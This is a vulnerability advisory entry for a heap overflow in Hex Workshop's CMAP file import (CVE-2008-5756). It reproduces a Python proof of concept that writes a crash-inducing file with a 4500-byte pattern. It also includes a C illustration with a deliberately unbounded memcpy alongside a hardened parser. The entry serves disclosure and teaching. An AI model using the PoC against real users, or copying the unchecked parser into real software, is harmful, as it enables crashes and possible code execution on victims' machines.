Hex Workshop CMAP File Handling Heap Overflow Vulnerability

Vulnerability ID: 1117145    Type: buffer overflow
Published: 2008-12-28    Updated: 2009-01-29
CVE: CVE-2008-5756    CNNVD ID: CNNVD-200812-479
Platform: Windows    CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/7592
https://cxsecurity.com/issue/WLB-2009010103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-479
|Vulnerability details
Hex Workshop is a hex editor from BreakPoint Software that supports hex editing, insertion, filling, deletion and similar operations. Its colour mapping (CMAP) files map a quoted hex sequence to a pair of RGB colours; the trailer bytes in the PoC below decode to ` = RGB(0, 0, 0), RGB(160, 160, 160)`, so one entry has the shape `"<hex sequence>" = RGB(fg), RGB(bg)`. If a user imports (Tools > Color Mapping) a malicious CMAP file whose quoted hex sequence is over-long, the parser overflows a heap buffer, which can lead to execution of arbitrary code. The published PoC only demonstrates the crash with a 4500-byte sequence; its author notes that turning it into code execution still needs work.
|Exploit (PoC)
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC
# Other versions are affected
#
# By: Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz: -=Mizo=- (Perra :-l), L!0N, El Mariachi, MiNi SpIder, GGY, and all my friends
################################################################################
#
# Just import enc.cmap from Tools > Color Mapping and see what happens ^_^
# I think it's easy to exploit but it needs some work *_^

# Over-long hex sequence: 4500 bytes inside the quoted pattern field of one entry
chars = "A" * 4500

# Trailer of a normal CMAP entry; the bytes spell ' = RGB(0, 0, 0), RGB(160, 160, 160)'
foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

# Write a single entry of the form "<pattern>" = RGB(fg), RGB(bg)  (\x22 is the double quote)
with open('enc.cmap', 'w') as f:
    f.write("\x22" + chars + "\x22" + foot)

# milw0rm.com [2008-12-28]
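A toy model of the defect, added here as an illustration and not Hex Workshop's code: the advisory attributes the overflow to an over-long hex sequence in a CMAP entry, and the PoC's trailer bytes decode to ` = RGB(0, 0, 0), RGB(160, 160, 160)`, so an entry looks like `"<hex sequence>" = RGB(fg), RGB(bg)`. The first parser below copies that quoted sequence into a fixed-size heap chunk without checking its length, and the hardened variant refuses the line before any heap write. The 256-byte `PATTERN_CAP`, the `cmap_entry` struct and every function name are assumptions made for the example; `make_poc_line` reproduces the shape of the file the PoC writes.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed heap-buffer size for the quoted hex sequence (hypothetical;
 * the advisory does not give Hex Workshop's real allocation size). */
#define PATTERN_CAP 256

struct cmap_entry {
    char *pattern;        /* heap copy of the quoted hex sequence */
    unsigned char fg[3];  /* first RGB(...) triple */
    unsigned char bg[3];  /* second RGB(...) triple */
};

/* Parse the trailer ` = RGB(r, g, b), RGB(r, g, b)` after the closing quote. */
static int parse_colours(const char *p, struct cmap_entry *e)
{
    int c[6];
    if (sscanf(p, " = RGB(%d, %d, %d), RGB(%d, %d, %d)",
               &c[0], &c[1], &c[2], &c[3], &c[4], &c[5]) != 6)
        return -1;
    for (int i = 0; i < 6; i++)
        if (c[i] < 0 || c[i] > 255)
            return -1;
    for (int i = 0; i < 3; i++) {
        e->fg[i] = (unsigned char)c[i];
        e->bg[i] = (unsigned char)c[i + 3];
    }
    return 0;
}

/* Shape of the bug: the quoted sequence is copied into a fixed-size heap chunk
 * with no length check, so anything longer than PATTERN_CAP overwrites the
 * heap past the chunk. Kept only to show the defect; never feed it the PoC. */
int parse_cmap_line_unsafe(const char *line, struct cmap_entry *e)
{
    if (line[0] != '"')
        return -1;
    const char *end = strchr(line + 1, '"');
    if (!end)
        return -1;
    size_t n = (size_t)(end - (line + 1));
    e->pattern = malloc(PATTERN_CAP);
    if (!e->pattern)
        return -1;
    memcpy(e->pattern, line + 1, n);   /* BUG: n is never compared to PATTERN_CAP */
    e->pattern[n] = '\0';
    return parse_colours(end + 1, e);
}

/* Hardened form: bound and validate the sequence before any heap write, and
 * size the allocation to the data instead of a fixed constant. */
int parse_cmap_line_safe(const char *line, struct cmap_entry *e)
{
    if (line[0] != '"')
        return -1;
    const char *end = strchr(line + 1, '"');
    if (!end)
        return -1;
    size_t n = (size_t)(end - (line + 1));
    if (n >= PATTERN_CAP)              /* over-long sequence: refuse the whole line */
        return -2;
    for (size_t i = 0; i < n; i++)     /* a hex sequence is hex digits and spaces */
        if (!isxdigit((unsigned char)line[1 + i]) && line[1 + i] != ' ')
            return -3;
    e->pattern = malloc(n + 1);
    if (!e->pattern)
        return -1;
    memcpy(e->pattern, line + 1, n);
    e->pattern[n] = '\0';
    if (parse_colours(end + 1, e) != 0) {
        free(e->pattern);
        e->pattern = NULL;
        return -1;
    }
    return 0;
}

/* Build a line in the PoC's shape: a quoted run of n_a 'A's followed by the
 * PoC's trailer bytes. The caller frees the result. */
char *make_poc_line(size_t n_a)
{
    static const char trailer[] = " = RGB(0, 0, 0), RGB(160, 160, 160)";
    char *line = malloc(n_a + 2 + sizeof trailer);
    if (!line)
        return NULL;
    line[0] = '"';
    memset(line + 1, 'A', n_a);
    line[1 + n_a] = '"';
    memcpy(line + 2 + n_a, trailer, sizeof trailer);   /* includes the NUL */
    return line;
}
```

Running `parse_cmap_line_safe(make_poc_line(4500), &e)` returns -2 without touching the heap, while a four-byte pattern parses to `"AAAA"` with a background of RGB(160, 160, 160). Only the hardened parser should ever see the 4500-byte line; the unsafe one exists to show that the whole defect is one missing comparison. Note that raising the fixed constant would only move the crash threshold, which is why the safe variant sizes the allocation to the data it validated.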
|References

XF: hexworkshop-cmap-bo(47630), http://xforce.iss.net/xforce/xfdb/47630
BID: 33023, http://www.securityfocus.com/bid/33023
MILW0RM: 7592, http://www.milw0rm.com/exploits/7592
VUPEN: ADV-2008-3519, http://www.frsirt.com/english/advisories/2008/3519
SREASON: 4838, http://securityreason.com/securityalert/4838
SECUNIA: 33327, http://secunia.com/advisories/33327